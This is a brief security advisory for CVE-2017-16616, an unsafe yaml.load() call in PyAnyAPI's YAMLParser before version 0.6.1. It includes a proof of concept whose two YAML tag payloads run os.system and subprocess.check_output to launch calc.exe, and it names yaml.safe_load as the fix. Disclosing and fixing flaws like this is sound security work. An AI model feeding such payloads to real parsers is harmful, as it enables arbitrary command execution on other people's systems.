CVE-2017-16616: YAMLParser in PyAnyAPI

Python Package:　　PyAnyAPI

Version:　　　　　 Before 0.6.1

Published:　　　　Nov. 7th. 2017

Reported by: 　　　　　 Joel

CVE-2017-16616 　　　CVE_details

Overview

PyAnyAPI is a Library for for convenient interface creation over various types of data in a declarative way. An issue was discovered in the pyanapi package before 0.6.1.Untrusted data passed into the yaml.load() function can execute arbitrary python commands resulting in command execution.

POC

1
2
3

from pyanyapi import YAMLParser
YAMLParser({'test': 'container > test'}).parse('!!python/object/apply:os.system ["calc.exe"]').test
YAMLParser({'test': 'container > test'}).parse('!!python/object/new:subprocess.check_output [["calc.exe"]]').test

Poc Video

Remediation

The updated versions of PyAnyAPI (0.6.1) correctly use the yaml.safe_load method which prevents remote code execution.